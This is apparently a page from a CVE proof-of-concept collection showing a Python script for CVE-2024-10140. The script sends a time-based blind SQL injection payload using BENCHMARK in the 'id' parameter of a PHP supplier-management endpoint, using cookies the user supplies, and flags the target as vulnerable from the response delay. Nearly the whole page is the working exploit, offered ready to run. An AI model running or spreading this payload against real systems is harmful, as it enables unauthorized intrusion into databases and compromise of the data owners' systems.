4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-10140
README.md
Rendering markdown...
POC / CVE-2024-10140.py PY
⬇ Raw GitHub ✕ Close 
import requests
from colorama import Fore, Style, init

init(autoreset=True)

url = input(f"{Fore.CYAN}Enter the target URL (e.g., http://example.com/php/manage_supplier.php): ")

cookies_input = input(f"{Fore.CYAN}Enter the cookies (e.g., PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f): ")
cookies = {}
if cookies_input:
    cookies = dict(item.split('=') for item in cookies_input.split('; '))

params = {
    "action": "delete",
    "id": "32 AND 2813=BENCHMARK(5000000,MD5(0x4f74656e))"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36",
    "Accept-Language": "en-US,en;q=0.9",
    "Referer": f"{url}",
}

response = requests.get(url, headers=headers, params=params, cookies=cookies)

if response.elapsed.total_seconds() > 2:
    print(f"{Fore.RED}[CRITICAL] Target is vulnerable!")
else:
    print(f"{Fore.GREEN}[SAFE] Target does not seem vulnerable.")

print(f"{Fore.YELLOW}Status Code: {response.status_code}")
print(f"{Fore.YELLOW}Response Length: {len(response.content)}")
print(f"{Fore.YELLOW}Response Body:\n{response.text[:500]}")